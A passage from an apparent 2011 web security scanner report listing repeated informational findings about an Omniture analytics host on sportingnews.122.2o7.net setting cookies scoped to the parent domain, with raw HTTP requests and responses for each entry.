Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41508008833043?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:06 GMT
Last-Modified: Fri, 06 May 2011 10:55:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www78
Content-Length: 0
Content-Type: text/plain
Connection: close

16.105. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41670060879550 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s41670060879550

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s41670060879550 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41670060879550?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:06 GMT
Last-Modified: Fri, 06 May 2011 10:55:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www262
Content-Length: 0
Content-Type: text/plain
Connection: close

16.106. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42057272375095 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s42057272375095

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42057272375095 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42057272375095?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www339
Content-Length: 0
Content-Type: text/plain
Connection: close

16.107. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42119171968661 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s42119171968661

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42119171968661 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42119171968661?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www72
Content-Length: 0
Content-Type: text/plain
Connection: close

16.108. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42397612622007 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s42397612622007

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42397612622007 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42397612622007?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www394
Content-Length: 0
Content-Type: text/plain
Connection: close

16.109. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42653564326465 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s42653564326465

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42653564326465 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42653564326465?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www47
Content-Length: 0
Content-Type: text/plain
Connection: close

16.110. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42715447763912 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s42715447763912

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42715447763912 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42715447763912?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www82
Content-Length: 0
Content-Type: text/plain
Connection: close

16.111. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42953626681119 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s42953626681119

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42953626681119 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42953626681119?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www83
Content-Length: 0
Content-Type: text/plain
Connection: close

16.112. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42998947284650 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s42998947284650

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42998947284650 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42998947284650?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www358
Content-Length: 0
Content-Type: text/plain
Connection: close

16.113. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43049185345880 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s43049185345880

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s43049185345880 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43049185345880?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www286
Content-Length: 0
Content-Type: text/plain
Connection: close

16.114. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4310452240519 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s4310452240519

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s4310452240519 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
